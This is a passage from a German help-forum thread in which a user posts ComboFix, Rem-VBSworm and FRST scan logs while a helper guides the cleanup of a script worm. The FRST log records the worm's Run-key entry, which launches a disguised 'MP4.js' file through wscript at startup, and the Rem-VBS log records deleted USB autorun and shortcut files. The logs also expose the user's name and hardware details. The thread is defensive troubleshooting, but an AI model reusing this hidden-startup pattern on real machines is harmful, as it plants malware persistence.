mSearch Page = hxxp://www.google.com
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\
FF - prefs.js: browser.startup.homepage - hxxps://mail.google.com/
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Wow6432Node-HKCU-Run-ASRockXTU - (no file)
Wow6432Node-HKCU-Run-zASRockInstantBoot - (no file)
Wow6432Node-HKCU-Run-AdobeBridge - (no file)
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*m*p*3*7Û`\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*1&1xxµ*€h*]
@Class="Shell"
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*1&1xxµ*€h*\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*ÇQ„$]
@Class="Shell"
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*ÇQ„$\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*àuìnàý*ˆ]
@Class="Shell"
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*àuìnàý*ˆ\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{6900898A-DFB6-6292-DEED-E1E91AA53164}*]
"mafaaaipknjicgchlogcmpbpal"=hex:6f,61,67,63,6d,67,6d,6f,63,6c,61,6d,65,6c,6c,
   61,69,69,65,64,68,64,6b,70,69,6c,6e,70,6b,62,00,6c
"abgadacjnehmelehimndopaponokpnbmbh"=hex:70,61,6d,61,6e,6e,63,6e,6d,63,6a,68,
   6d,6e,65,62,64,63,69,6a,6f,6f,69,69,6f,67,61,6f,6f,6d,66,6c,00,ff
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\SecuROM\!CAUTION! NEVER A OR CHANGE ANY KEY*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_USERS\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\SecuROM\License information*]
"datasecu"=hex:8c,76,e3,f7,36,3a,9b,da,90,ec,69,1d,06,a7,14,bd,db,ae,60,58,db,
   4c,2c,77,ce,5d,3c,8b,8a,61,82,a0,e1,b2,98,55,e8,d2,2c,89,99,00,35,df,52,45,\
"rkeysecu"=hex:29,23,be,84,e1,6c,d6,ae,52,90,49,f1,f1,bb,e9,eb
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2016-04-09  18:51:43
ComboFix-quarantined-files.txt  2016-04-09 16:51
.
Vor Suchlauf: 24 Verzeichnis(se), 110.149.431.296 Bytes frei
Nach Suchlauf: 25 Verzeichnis(se), 110.005.514.240 Bytes frei
.
- - End Of File - - EFE45B8827C48FA56A79C99664C6F213
A36C5E4F47E84449FF07ED3517B43A31

Vielen vielen Dank weiterhin!

deeprybka · 09.04.2016, 18:06

Wichtige Online-Passwörter von einem sauberen PC aus ändern.

Poste mir bitte noch das Rem-VBS.log.

Buggerns · 09.04.2016, 18:11

Code:

ATTFilter

Rem-VBSworm v7.0

=========== - General info:

Running under: Ben on profile: C:\Users\Ben
Computer name: HAL

Operating System:
Microsoft Windows 7 Professional  

Boot Mode:
Normal boot  

Antivirus software installed:
Avira Antivirus  


Executed on: 09.04.2016 @ 18:15:00,32

=========== - Drive info:

Listing currently attached drives:
Caption  Description         VolumeName         

C:       Lokale Festplatte                      

D:       Lokale Festplatte   FREECOM HDD        

E:       CD                                     

F:       Lokale Festplatte                      

G:       Lokale Festplatte   System-reserviert  

H:       Lokale Festplatte   Media              

I:       Lokale Festplatte   Festplatte         

J:       Wechseldatentr„ger                     

K:       Wechseldatentr„ger                     

L:       CD                  World of Goo       

M:       Wechseldatentr„ger                     

N:       Wechseldatentr„ger                     

O:       Wechseldatentr„ger                     

R:       Lokale Festplatte                      




Physical drives information:
C: \Device\HarddiskVolume2 NTFS
D: \Device\HarddiskVolume7 NTFS
F: \Device\HarddiskVolume5 NTFS
G: \Device\HarddiskVolume1 NTFS
H: \Device\HarddiskVolume4 NTFS
R: \Device\HarddiskVolume6 NTFS
I: \Device\HarddiskVolume12 NTFS
O: \Device\HarddiskVolume13 FAT
L: \Device\CdRom1 CDFS

=========== - Disinfection info:

Panda USB Vaccine was downloaded!!
ERFOLGREICH: Der Prozess "wscript.exe" mit PID 4052 wurde beendet.
ERFOLGREICH: Der Prozess "wscript.exe" mit PID 3884 wurde beendet.
ERFOLGREICH: Der Prozess "rundll32.exe" mit PID 3956 wurde beendet.

INFORMATION: Es werden keine Aufgaben mit den angegebenen Kriterien ausgefhrt.

INFORMATION: Es werden keine Aufgaben mit den angegebenen Kriterien ausgefhrt.

=========== - Shortcut info:

Shortcut: "C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OpenOffice.org 3.3.lnk"
----------------------------------------------------------------
Shortcut: "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk"
----------------------------------------------------------------

=========== - Scheduled tasks info:


=========== - USB drive info:

o: selected

USB Device ID:
IDE\DISKSAMSUNG_HD103SI_________________________1AG01118\5&930A464&0&1.1.0       

IDE\DISKSAMSUNG_HD103SJ_________________________1AJ10001\5&1BEA5509&0&0.0.0      

IDE\DISKSAMSUNG_SSD_840_PRO_SERIES______________DXM03B0Q\5&930A464&0&1.0.0       

IDE\DISKWDC_WD40EZRX-00SPEB0____________________80.00A80\5&1BEA5509&0&0.1.0      

USBSTOR\DISK&VEN_CBM&PROD_FLASH_DISK&REV_5.00\252002001B257602&0                 

USBSTOR\DISK&VEN_FREECOM&PROD_HARD_DRIVE_XS&REV_1.00\FF1000DF00F246F9FC315267&0  

USBSTOR\DISK&VEN_GENERIC-&PROD_COMPACT_FLASH&REV_1.01\058F63626476&1             

USBSTOR\DISK&VEN_GENERIC-&PROD_MS/MS-PRO&REV_1.03\058F63626476&3                 

USBSTOR\DISK&VEN_GENERIC-&PROD_SD/MMC&REV_1.00\058F63626476&0                    

USBSTOR\DISK&VEN_GENERIC-&PROD_SM/XD-PICTURE&REV_1.02\058F63626476&2             




Datei wurde gel”scht - o:\Behn.lnk
Datei wurde gel”scht - o:\Sohn.lnk
Datei wurde gel”scht - o:\.lnk
Datei wurde gel”scht - o:\Desktop.lnk
Datei wurde gel”scht - o:\Arbeit.lnk
Datei wurde gel”scht - o:\Soph.lnk
Datei wurde gel”scht - o:\DRUCK.lnk
Datei wurde gel”scht - o:\ALT.lnk
Datei wurde gel”scht - o:\System Volume Information.lnk
Datei wurde gel”scht - o:\x(.lnk
Datei wurde gel”scht - o:\AUTORUN.lnk
Datei wurde gel”scht - o:\AUTORUN.INF
WARNING
Listing root contents of o:

 Verzeichnis von O:\

08.04.2011  01:25                64 Desktop.ini
25.06.2015  12:08    <DIR>          x(
10.09.2015  20:07            55.116 VID-20151943-WA0114.MP4.js
28.10.2015  15:46    <DIR>          ALT
24.12.2015  11:43           510.090 Behn.pdf
24.12.2015  11:45           494.324 Sohn.pdf
08.01.2016  13:30        21.135.360 .HPIMAGE.VFS
15.01.2016  11:44    <DIR>          Arbeit
27.01.2016  12:52    <DIR>          DRUCK
15.02.2016  11:48    <DIR>          Soph
               5 Datei(en),     22.194.954 Bytes
               6 Verzeichnis(se),     66.912.256 Bytes frei

USB drive disinfected and files unhidden

deeprybka · 09.04.2016, 18:14

Der PC wurde aber geimpft? Ich persönlich würde es ja als User cooler finden, wenn Avira die Malware blockiert hätte und nicht unsere Tools.

Bitte jetzt ein frische FRST-Logs:

Schritt 1

Bitte starte FRST erneut, markiere auch die checkbox

und drücke auf Untersuchen.
Bitte poste mir den Inhalt der beiden Logs die erstellt werden.

Buggerns · 09.04.2016, 18:23

PC wurde geimpft und ja, fände ich auch cooler

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
durchgeführt von Ben (Administrator) auf HAL (09-04-2016 19:21:10)
Gestartet von C:\Users\Ben\Desktop
Geladene Profile: Ben (Verfügbare Profile: Ben)
Platform: Windows 7 Professional Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Sidebar\sidebar.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio\THXNBSet\THXAudNB.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(OpenOffice.org) C:\Program Files (x86)\OpenOffice.org 3\program\soffice.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(OpenOffice.org) C:\Program Files (x86)\OpenOffice.org 3\program\soffice.bin
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Disc Soft Ltd) C:\Program Files (x86)\DAEMON Tools Lite\DTShellHlp.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11855976 2011-05-18] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM-x32\...\Run: [THX TruStudio NB Settings] => C:\Program Files (x86)\Creative\THX TruStudio\THXNBSet\THXAudNB.exe [909824 2011-05-19] (Creative Technology Ltd)
HKLM-x32\...\Run: [UpdReg] => C:\Windows\UpdReg.EXE
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2012-02-20] (Apple Inc.)
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [527864 2012-12-10] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-11] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\AMD\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-07-28] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [66328 2016-01-27] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1994752 2014-02-20] (Wondershare)
HKLM-x32\...\Run: [VID-20151943-WA0114] => wscript.exe //B "C:\Users\Ben\AppData\Local\Temp\VID-20151943-WA0114.MP4.js" <===== ACHTUNG
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672640 2013-03-14] (Disc Soft Ltd)
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3077712 2016-03-31] (Valve Corporation)
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\...\Run: [GoogleChromeAutoLaunch_8B4B86C2A5661DC92D9A84E265233F91] => C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe [874136 2016-03-27] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk [2013-04-17]
ShortcutTarget: Adobe Gamma.lnk -> C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\errorlog.txt [2016-04-09] ()
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OpenOffice.org 3.3.lnk [2012-03-16]
ShortcutTarget: OpenOffice.org 3.3.lnk -> C:\Program Files (x86)\OpenOffice.org 3\program\quickstart.exe ()
Startup: C:\Users\Ben\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID-20151943-WA0114.MP4.js [2015-09-10] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9AC5FAFD-36B5-46D0-995A-B1A01FC0C8D9}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{D06532B5-E6AF-47BB-AB3E-470FFE525DD7}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1744302370-2936264581-3152195107-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files (x86)\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll [2011-12-12] (DivX, LLC)
BHO-x32: Kein Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> Keine Datei
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll => Keine Datei

FireFox:
========
FF ProfilePath: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default
FF Homepage: hxxps://mail.google.com/
FF Session Restore: -> ist aktiviert.
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2011-06-20] (DivX, LLC.)
FF Plugin: @java.com/DTPlugin,version=10.9.2 -> C:\Windows\system32\npDeployJava1.dll [2012-11-05] (Oracle Corporation)
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll [2011-12-13] (DivX, LLC)
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll [2011-06-20] (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=1.6.0_37 -> C:\Windows\SysWOW64\npdeployJava1.dll [2012-09-24] (Sun Microsystems, Inc.)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1744302370-2936264581-3152195107-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-1744302370-2936264581-3152195107-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Ben\AppData\Local\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-1744302370-2936264581-3152195107-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Ben\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-06-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\searchplugins\filestube.xml [2013-02-26]
FF SearchPlugin: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\searchplugins\youtube-video-search.xml [2016-01-13]
FF SearchPlugin: C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\searchplugins\youtube-videosuche.xml [2012-02-09]
FF Extension: DivX Web Player - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\DivXWebPlayer@divx.com.xpi [2012-02-18] [ist nicht signiert]
FF Extension: Firebug - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\firebug@software.joehewitt.com.xpi [2016-03-31]
FF Extension: ZenMate Security, Privacy & Unblock VPN - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\firefox@zenmate.com.xpi [2016-03-02]
FF Extension: Zotero - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\zotero@chnm.gmu.edu [2012-12-22] [ist nicht signiert]
FF Extension: Adblock Plus - C:\Users\Ben\AppData\Roaming\Mozilla\Firefox\Profiles\00l7ys0v.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-02-23]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2016-04-09] [ist nicht signiert]
FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5
FF Extension: DivX Plus Web Player HTML5 &video& - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012-02-21] [ist nicht signiert]

Chrome: 
=======
CHR Plugin: (Native Client) - C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\ppGoogleNaClPluginChrome.dll => Keine Datei
CHR Plugin: (Chrome PDF Viewer) - C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\pdf.dll => Keine Datei
CHR Plugin: (Shockwave Flash) - C:\Users\Ben\AppData\Local\Google\Chrome\Application\49.0.2623.110\gcswf32.dll => Keine Datei
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll => Keine Datei
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll => Keine Datei
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (DivX Plus Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => Keine Datei
CHR Plugin: (Java(TM) Platform SE 6 U33) - C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll => Keine Datei
CHR Plugin: (Java Deployment Toolkit 6.0.330.3) - C:\Windows\SysWOW64\npdeployJava1.dll (Sun Microsystems, Inc.)
CHR Plugin: (Pando Web Plugin) - C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll => Keine Datei
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Profile: C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Adblock Plus) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-09]
CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2016-03-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-09]
CHR Extension: (Mehr Leistung und Videoformate für dein HTML5 <video>) - C:\Users\Ben\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm [2015-07-26]
CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2011-12-12]
StartMenuInternet: Google Chrome.53QMR6CZC4UNUZZHKCZYJRUEPU - C:\Users\Ben\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2013-04-17] (Adobe Systems) [Datei ist nicht signiert]
R2 AMD FUEL Service; C:\Program Files\AMD\ATI.ACE\Fuel\Fuel.Service.exe [344064 2015-07-28] (Advanced Micro Devices, Inc.) [Datei ist nicht signiert]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-11] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-11] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-11] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-11] (Avira Operations GmbH & Co. KG)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [260456 2016-01-27] (Avira Operations GmbH & Co. KG)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AODDriver4.3; C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [59616 2014-02-11] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [154816 2016-03-11] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [133168 2016-03-11] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2015-07-26] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\System32\DRIVERS\avnetflt.sys [69888 2016-03-11] (Avira Operations GmbH & Co. KG)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2013-04-14] (DT Soft Ltd)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564792 2012-02-08] (Duplex Secure Ltd.)
S2 AODDriver4.01; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-09 18:51 - 2016-04-09 18:51 - 00021754 _____ C:\ComboFix.txt
2016-04-09 18:24 - 2016-04-09 18:51 - 00000000 ____D C:\Qoobox
2016-04-09 18:24 - 2016-04-09 18:50 - 00000000 ____D C:\Windows\erdnt
